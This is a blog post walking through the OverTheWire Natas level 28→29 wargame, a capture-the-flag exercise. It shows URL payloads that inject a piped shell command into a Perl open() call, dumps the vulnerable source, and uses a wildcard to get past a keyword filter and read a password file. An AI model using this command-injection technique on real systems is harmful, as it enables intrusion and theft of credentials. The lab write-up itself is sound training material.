<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="Wall's wall">

    <link rel="shortcut icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="stylesheet" href="https://cdnjs.Cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" href="/assets/css/main.min.css ">
    <link rel="canonical" href="/2021/06/07/natas28-29/">
    <link rel="alternate" type="application/rss+xml" title="Caminek" href="/feed.xml ">
    
    <!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Natas Level 28 → Level 29 | Caminek</title>
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Natas Level 28 → Level 29" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Wall’s wall" />
<meta property="og:description" content="Wall’s wall" />
<link rel="canonical" href="/2021/06/07/natas28-29/" />
<meta property="og:url" content="/2021/06/07/natas28-29/" />
<meta property="og:site_name" content="Caminek" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-06-07T13:23:26-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Natas Level 28 → Level 29" />
<script type="application/ld+json">
{"@type":"BlogPosting","description":"Wall’s wall","mainEntityOfPage":{"@type":"WebPage","@id":"/2021/06/07/natas28-29/"},"headline":"Natas Level 28 → Level 29","url":"/2021/06/07/natas28-29/","dateModified":"2021-06-07T13:23:26-04:00","datePublished":"2021-06-07T13:23:26-04:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->






</head>


  <body>

    <header id="top">
    <div class="wrapper">
        
            <img src="/assets/img/misc/avatar.png" alt="site.icon" width="32" height="32" style="vertical-align:middle"/>
        
        <a href="/" class="brand">Caminek</a>
        <small></small>
        <button id="headerMenu" class="menu"><i class="fa fa-bars"></i></button>
        <nav id="headerNav">
            <ul>
                <li>
                    
                    <a href="/">
                    
                        <i class="fa fa-home"></i>Home
                    </a>
                </li>

                
                    
                    <li>
                        
                        <a href="/series/">
                        
                            <i class="fa fa-book"></i>Series
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/archive/">
                        
                            <i class="fa fa-archive"></i>Archives
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/category/">
                        
                            <i class="fa fa-th-list"></i>Categories
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/tag/">
                        
                            <i class="fa fa-tags"></i>Tags
                        </a>
                    </li>
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
            </ul>
        </nav>
    </div>
</header>


        <div class="page clearfix" index>
    <div class="left">
        <h1>Natas Level 28 → Level 29</h1>
        <div class="label">

            <div class="label-card">
                <i class="fa fa-calendar"></i> 2021-06-07
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
            


<!-- <span class="point">•</span> -->
<span class="categories">
  <i class="fa fa-th-list"></i>
  
    
        <a href="/category/#ctf" title="Category: ctf" rel="category">ctf</a>&nbsp;
    
        <a href="/category/#wargames" title="Category: wargames" rel="category">wargames</a>&nbsp;
    
        <a href="/category/#web-security" title="Category: web-security" rel="category">web-security</a>
    
  

  <!-- <span class="point">•</span> -->
</span>


            </div>

            <div class="label-card">
            
<!-- <span class="point">•</span> -->
<span class="pageTag">
  <i class="fa fa-tags"></i>
  
    
        <!--a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a-->
        <a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a>&nbsp;
    
        <!--a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a-->
        <a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a>&nbsp;
    
        <!--a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a-->
        <a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a>&nbsp;
    
        <!--a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a-->
        <a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a>
    
  

</span>

            </div>

        </div>
        <hr>
        <article itemscope itemtype="http://schema.org/BlogPosting">
            <h2 id="level-goal">Level Goal</h2>
<p>Excluding the URL and username, the Level Goal section is blank for the Natas ctf.</p>

<h2 id="solution">Solution</h2>
<p>The natas29 site greets us with leetspeek and a dropdown menu. Selecting any of the “perl underground” options displays a rather long text. Unsurprisingly we see from the URL that the site is using Perl. No source code is available.</p>

<p>The first thing that came to mind was a BlackHat talk named, <a href="https://www.youtube.com/watch?v=BYl3-c2JSL8">The Perl Jam 2: The Camel Strikes Back</a>. This talk covers several flaws in Perl, one of which was an RCE that could be done by appending a pipe to the URL. You can watch a quick explanation start at <a href="https://youtu.be/BYl3-c2JSL8?t=1364">22:44</a> and ending around 23:16 as to what is happening.</p>

<p>The natas29 site seems a bit sensitive to how the URL is constructed. Unlike the video above, we need to end our command with a semicolon and it must be URL Encoded otherwise, the payload fails. There’s no harm or need to URL Encode spaces. Also, we can ignore the filename and start our payload with a pipe.</p>

<p>Enter the following URL into your browser:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://natas29.natas.labs.overthewire.org/index.pl?file=|cat /etc/natas_webpass/natas30%3b
</code></pre></div></div>

<p>Instead of seeing the password, we see <strong>meeeeeep!</strong> Let’s change our payload to index.pl to see what’s going on.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20index.pl%3b
</code></pre></div></div>

<p>The output is too difficult to look at on the rendered page. View the source for the webpage and you’ll see the following:</p>
<div class="language-perl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span><span class="p">(</span><span class="nv">param</span><span class="p">('</span><span class="s1">file</span><span class="p">')){</span>
    <span class="nv">$f</span><span class="o">=</span><span class="nv">param</span><span class="p">('</span><span class="s1">file</span><span class="p">');</span>
    <span class="k">if</span><span class="p">(</span><span class="nv">$f</span><span class="o">=~</span><span class="sr">/natas/</span><span class="p">){</span>
        <span class="k">print</span> <span class="p">"</span><span class="s2">meeeeeep!&lt;br&gt;</span><span class="p">";</span>
    <span class="p">}</span>
    <span class="k">else</span><span class="p">{</span>
        <span class="nb">open</span><span class="p">(</span><span class="nv">FD</span><span class="p">,</span> <span class="p">"</span><span class="si">$f</span><span class="s2">.txt</span><span class="p">");</span>
        <span class="k">print</span> <span class="p">"</span><span class="s2">&lt;pre&gt;</span><span class="p">";</span>
        <span class="k">while</span> <span class="p">(</span><span class="o">&lt;</span><span class="nv">FD</span><span class="o">&gt;</span><span class="p">){</span>
            <span class="k">print</span> <span class="nn">CGI::</span><span class="nv">escapeHTML</span><span class="p">(</span><span class="vg">$_</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">print</span> <span class="p">"</span><span class="s2">&lt;/pre&gt;</span><span class="p">";</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Here we see the filtering that was responsible for the “meeeeeep!” message. We also see the call to <strong>open()</strong> that allows this attack to work. We also see why we need a semicolon. The code appends <strong>.txt</strong> to the name of the file passed into open().</p>

<p>To get the password we can bypass the filters by using some very basic regex. I’ve randomly chosen to use replace the letter ‘t’ in natas and used the question-mark operator. The question-mark operator will allow us to match either zero or one character at the given location.</p>

<p>Here’s the URL I used</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/na?as_webpass/na?as30%3b
</code></pre></div></div>

<p>The site will present you with the password for the next level.</p>

        </article>
        <hr>
        

        <div class="post-recent">
    <div class="pre" style="display:inline-block; margin-top: 20px;">
        
        <p><i class="fa fa-arrow-left"></i> <a href="/2021/06/01/natas27-28/">Natas Level 27 → Level 28</a></p>
        
    </div>
    <div class="nex" style="display:inline-block; margin-top: 20px; float:right;">
        
        <p><a href="/2021/06/07/natas29-30/">Natas Level 29 → Level 30</a> <i class="fa fa-arrow-right"></i></p>
        
    </div>
</div>

        
        
        

    </div>
    <button class="anchor"><i class="fa fa-anchor"></i></button>
    <div class="right">
        <div class="wrap">
            
            <!-- Series -->
            <div class="side ">
                <div>
                    <i class="fa fa-book" aria-hidden="true"></i>
                    Series
                </div>
                <ul class="content-ul" srs>
                    
                    
                    

                    

                    
                    

                    
                        
                            <li>
                                
                                    <a href="/2021/06/07/natas30-31/">Natas Level 30 → Level 31</a>
                                
                            </li>
                        

                    
                        
                            <li>
                                
                                    <a href="/2021/06/07/natas29-30/">Natas Level 29 → Level 30</a>
                                
                            </li>
                        

                    
                        
                            <li>
                                
                                    <strong>Natas Level 28 → Level 29</strong>
                                
                            </li>
                        

                    
                        
                            <li>
                                
                                    <a href="/2021/06/01/natas27-28/">Natas Level 27 → Level 28</a>
                                
                            </li>
                        

                    
                        
                            <li>
                                
                                    <a href="/2021/05/31/natas26-27/">Natas Level 26 → Level 27</a>
                                
                            </li>
                        

                    
                </ul>
            </div>

            <!-- Recent -->
            <div class="side">
                <div>
                    <i class="fa fa-pencil-square-o" aria-hidden="true"></i>
                    Recent Posts
                </div>
                <ul class="content-ul" recent>
                    
                        <li><a href="/2021/06/07/natas31-32/">Natas Level 31 → Level 32</a></li>
                    
                        <li><a href="/2021/06/07/natas30-31/">Natas Level 30 → Level 31</a></li>
                    
                        <li><a href="/2021/06/07/natas29-30/">Natas Level 29 → Level 30</a></li>
                    
                        <li><a href="/2021/06/07/natas28-29/">Natas Level 28 → Level 29</a></li>
                    
                        <li><a href="/2021/06/01/natas27-28/">Natas Level 27 → Level 28</a></li>
                    
                </ul>
            </div>
            
            <!-- Content -->
            <div class="side ">
                <div>
                    <i class="fa fa-th-list"></i>
                    Categories
                </div>
                <ul class="content-ul" cate>
                    
                    <li>
                        <a href="/category/#reverse-engineering" class="categories-list-item" cate="reverse-engineering">
                            <span class="name">
                                reverse-engineering
                            </span>
                            <span class="badge">13</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#x86-64" class="categories-list-item" cate="x86-64">
                            <span class="name">
                                x86-64
                            </span>
                            <span class="badge">8</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#ctf" class="categories-list-item" cate="ctf">
                            <span class="name">
                                ctf
                            </span>
                            <span class="badge">73</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#wargames" class="categories-list-item" cate="wargames">
                            <span class="name">
                                wargames
                            </span>
                            <span class="badge">68</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#linux" class="categories-list-item" cate="linux">
                            <span class="name">
                                linux
                            </span>
                            <span class="badge">35</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#web-security" class="categories-list-item" cate="web-security">
                            <span class="name">
                                web-security
                            </span>
                            <span class="badge">33</span>
                        </a>
                    </li>
                    
                </ul>
            </div>

            <!-- Tag Cloud -->
            
        </div>
    </div>
</div>
<script>
/**
 * target _blank
 */
(function() {
    var aTags = document.querySelectorAll('article a:not([id])')
    for (var i = 0; i < aTags.length; i++) {
        aTags[i].setAttribute('target', '_blank')
    }
}());
</script>
<!-- <script src="/assets/js/pageContent.js " charset="utf-8"></script> -->


    <footer class="site-footer">


    <div class="wrapper">

        <p class="description">
            
        </p>
        <p class="contact">
            Find me on: 
            <a href="https://github.com/caminek" title="GitHub"><i class="fa fa-github" aria-hidden="true"></i></a> 
             
        </p>
        <p class="power">
            <span>
                Site powered by <a href="https://jekyllrb.com/">Jekyll</a> & <a href="https://pages.github.com/">Github Pages</a>.
            </span>
            <span>
                Theme designed by <a href="https://github.com/Gaohaoyang">HyG</a>, and modified by <a href="https://github.com/caminek">caminek</a>.
            </span>
        </p>
    </div>
</footer>

    <div class="back-to-top">
    <a href="#top" data-scroll>
        <i class="fa fa-arrow-up" aria-hidden="true"></i>
    </a>
</div>

    <!-- <script src=" /assets/js/main.js " charset="utf-8"></script>
    <script src=" /assets/js/smooth-scroll.min.js " charset="utf-8"></script> -->
    <script src=" /assets/js/all.js " charset="utf-8"></script>
    <script type="text/javascript">
      smoothScroll.init({
        speed: 500, // Integer. How fast to complete the scroll in milliseconds
        easing: 'easeInOutCubic', // Easing pattern to use
        offset: 20, // Integer. How far to offset the scrolling anchor location in pixels
      });
    </script>
    <!-- <script src=" /assets/js/scroll.min.js " charset="utf-8"></script> -->
  </body>

</html>
